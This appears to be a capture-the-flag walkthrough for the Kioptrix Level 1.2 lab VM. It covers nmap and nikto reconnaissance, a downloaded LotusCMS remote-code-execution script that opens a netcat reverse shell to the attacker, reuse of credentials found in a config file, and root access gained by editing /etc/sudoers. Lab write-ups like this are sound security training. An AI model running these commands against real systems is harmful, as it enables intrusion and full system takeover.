Link: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
- Network discovery
nmap -sn <ip>/24
My target is 10.0.2.8.
Reading VM’s file. I have to edit the host file.
On the attacker machine, edit the host file.
nano /etc/hosts
Add IP and host name.
2. Port scan
nmap -Pn 10.0.2.8nmap -Pn -p1000- 10.0.2.8
There’re only 2 open ports.
3. OS and service scan
nmap -A -p22,80 10.0.2.8
4. Vuln scan
nmap --script vuln -p22,80 10.0.2.8
There’re pages on HTTP service on port 80 and possibility of SQL injection.
6. Nikto scan
nikto -h http://10.0.2.8
There’s “/phpmyadmin” and some other possible vulnerabilities.
7. Access the site
View page source
Explore everything
Last one is login page, it indicated that this site was based on LotusCMS.
8. Exploitation
Search for exploit scripts
searchsploit lotuscms
There’s a script, but it’s metasploit script.
After googling, I came across this script.
Download it
wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
Change the permission and run the script
chmod 777 lotusRCE.sh./lotusRCE.sh
I got the usage.
Run the script again
./lotusRCE.sh kioptrix3.com
Before supplying an IP, I need reverse shell.
Create listener on port 1234
rlwrap nc -lvp 1234
Supplying input
IP: 10.0.2.24 (attacker ip)PORT : 1234
I select first netcat command
#? 1
Back to listener, now I have a shell. Type some command to verify
ls
I need TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Verify user
whoami
9. Privilege escalation
cd /homels
There’re 3 directories.
In loneferret there’re 2 interesting files.
cat checksec.sh | less
Not much right now.
Read next file
cat CompanyPolicy.README
There’re “sudo ht” command to use.
Let’s try
sudo ht
I don’t have password for ‘www-data’.
Continue exploring in “/www”. Normally, CMS has config file containing username and password for SQL connection and I have to find it.
I found it on gconfig.php
cat gconfig.php
Now I have username and password for mysql.
Since the site also has PHPMyAdmin, I’ll access the MySQL DB w/ GUI.
Accessing database: galley and table: dev_accounts. I have hashes of these users, dreg and loneferret.
Crack it w/ crackstation
Change user to dreg
su dregMast3r
I tried to explore, but it didn’t allow me to use ‘cd’ command.
Tried ‘sudo ht’. User ‘dreg’ is not in the sudoers file.
Change to loneferret
su loneferretstarwars
Tried sudo ht
sudo ht
I could not use this command due to terminal was not fully functional.
Since it involved ‘sudo ht’, my first guessing for privilege escaltion must be sudo permission
Verify sudo permission of loneferret
sudo -l
Tried su
sudo su
Not allowed
Next is ‘ht’ command, I did not know what it is. Eventually, I googled it and found that it is an editor. Because of that, I can run ‘sudo ht’ and edit sudoers file to escalate my privilege.
I need fully functional terminal
ssh loneferret@10.0.2.8
I found a guide to use ht editor.
Run the ht
sudo ht
Press F3 and type “/etc/sudoers” and press “Enter” to open the file
My first try was removing ‘!’
Press F2 to save and CTRL+c to exit
sudo su -
Still no go
Edit the file again by adding
/bin/bash
Verify editing
sudo -l
sudo /bin/bash -p
Now I’m root.
Find the flag
cd /root
cat Congrats.txt